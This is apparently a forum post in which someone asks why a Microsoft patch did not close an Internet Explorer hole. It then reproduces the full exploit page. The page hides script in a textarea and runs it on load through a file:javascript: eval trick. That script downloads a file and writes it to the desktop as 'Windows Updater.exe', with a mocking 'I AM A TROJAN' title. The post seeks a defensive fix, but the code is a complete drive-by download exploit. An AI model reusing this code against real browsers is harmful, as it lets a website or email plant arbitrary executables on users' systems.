The follwoign code appears to exploit a vulnerability in IE
to allow a website or malicious email to install arbitrary
executables anywhere on a users system. Our microsoft
consultant has said that security patch
Q318203_MSXML30_x86.exe will patch the hole, but after
installing this patch and rebooting, the IE vulnerability
REMAINS IN PLACE.
IS there a fix???
**************************
Start of code example
**************************
html>
<head>
<title>I AM A TROJAN</title>
</head>
<body>
<textarea id="code" style="display:none;">
var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET", "http://www.google.com",0);
x.Send();
var s = new ActiveXObject("ADODB.Stream");
s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);
s.SaveToFile("C:\\Documents and Settings\\All
Users\\Desktop\\Windows Updater.exe",2);
location.href = "mms://";
</textarea>
<script language="javascript">
function preparecode(code) {
result = '';
lines = code.split(/\r\n/);
for (i=0;i<lines.length;i++) {
line = lines[i];
line = line.replace(/<\s+/,"");
line = line.replace(/\s+$/,"");
line = line.replace(/'/g,"\\'");
line = line.replace(/[\\]/g,"\\\\");
line = line.replace(/[/]/g,"%2f");
if (line != '') {
result += line +'\\r\\n';
}
}
return result;
}
function doit() {
mycode = preparecode(document.all.code.value);
myURL = "file:javascript:eval('" + mycode + "')";
window.open(myURL,"_media");
}
setTimeout("doit()", 1);
</script>
<H2>Look on your Desktop for Windows Updater.exe</H2>
<H2><FONT COLOR=RED>Ha Ha</FONT></H2>
</body>
</html>
|
Similar Threads
